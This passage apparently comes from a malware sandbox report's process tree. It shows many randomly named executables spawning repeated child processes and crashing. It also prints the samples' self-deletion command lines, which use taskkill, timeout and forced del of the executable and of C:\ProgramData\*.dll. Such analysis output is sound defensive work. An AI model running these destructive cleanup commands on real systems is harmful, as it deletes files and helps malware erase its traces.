C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:28064

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:20448

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:24256

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:23448

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:27492

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:25896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 25896 -s 28
13⤵
- Program crash
PID:16068

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:21812

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:21248

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:20244

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:27816

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:31568

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:31416

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:15188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 15188 -s 28
13⤵
- Program crash
PID:23144

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:25656

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:30268

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:26440

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:32632

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:21464

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:32344

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:31952

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:28996

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:27156

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:19912

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:8160

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:33108

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:31320

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:32800

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:27944

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:30112

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:33568

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:33708

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:2944

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:15080

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:2168

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:29860

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:11280

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:17720

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:31864

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:19352

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:34168

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:29744

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:34308

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:33668

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:26892

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:26000

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:30940

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:33960

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:29804

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:19840

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:33016

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:35376

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:9508

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:36088

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:35348

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:24264

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:17828

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:22312

C:\Users\Admin\Documents\5RtddOjLvpjdX4L8dUGlaasf.exe
"C:\Users\Admin\Documents\5RtddOjLvpjdX4L8dUGlaasf.exe"
11⤵
PID:1300

C:\Users\Admin\Documents\5RtddOjLvpjdX4L8dUGlaasf.exe
"C:\Users\Admin\Documents\5RtddOjLvpjdX4L8dUGlaasf.exe"
12⤵
PID:8276

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 5RtddOjLvpjdX4L8dUGlaasf.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\5RtddOjLvpjdX4L8dUGlaasf.exe" & del C:\ProgramData\*.dll & exit
13⤵
PID:7408

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 5RtddOjLvpjdX4L8dUGlaasf.exe /f
14⤵
- Kills process with taskkill
PID:11204

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
14⤵
- Delays execution with timeout.exe
PID:12092

C:\Users\Admin\Documents\I71Z7ipHVnjTBhsQBRq8F9CV.exe
"C:\Users\Admin\Documents\I71Z7ipHVnjTBhsQBRq8F9CV.exe"
11⤵
PID:1080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 280
12⤵
- Program crash
PID:6184

C:\Users\Admin\Documents\Z6TxdHjJu_4yLFn8E7ESiqj6.exe
"C:\Users\Admin\Documents\Z6TxdHjJu_4yLFn8E7ESiqj6.exe"
11⤵
PID:1088

C:\Users\Admin\Documents\gNFNEVK2g5N_o3mBAcxajsjQ.exe
"C:\Users\Admin\Documents\gNFNEVK2g5N_o3mBAcxajsjQ.exe"
11⤵
PID:4360

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\gNFNEVK2g5N_o3mBAcxajsjQ.exe"
12⤵
PID:3036

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
13⤵
- Delays execution with timeout.exe
PID:6308

C:\Users\Admin\Documents\srFyWHY6WRa5_WSlKzO3Xbh9.exe
"C:\Users\Admin\Documents\srFyWHY6WRa5_WSlKzO3Xbh9.exe"
11⤵
PID:1636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 280
12⤵
- Program crash
PID:6792

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
"C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe"
11⤵
PID:2960

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:6640

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:7056

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:5400

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:4800

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:664

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:6296

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:7512

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:8088

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:8132

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:7984

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:6700

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:6364

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:8356

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:8844

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:6888

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:7616

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:8868

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:6660

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:9908

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:9580

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:7036

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:9664

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:9552

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:8476

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:10176

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:8768

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:10248

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:10788

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:10312

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:11208

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:3668

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:10868

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:11616

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:12104

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:6724

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:3088

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:12056

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:11260

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:11324

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:7472

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:3316

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:4016

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:12932

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:12544

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:13232

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:12312

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:1296

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:1168

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:12728

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:14220

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:13864

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:11020

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:10604

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 28
13⤵
- Program crash
PID:1544

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:4004

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:9672

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:14608

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:11680

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:8872

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:14500

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:10820

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:5036

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:7004

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:2620

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:15372

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:15896

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:7960

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:16016

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:15148

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:12828

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:11296

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:15992

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:16548

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:17172

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:16488

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:17348

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:11820

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:16752

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:18040

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:17924

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:18404

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:12664

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:17428

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:14736

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:19028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 19028 -s 28
13⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:1732

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:18012

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:3292

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
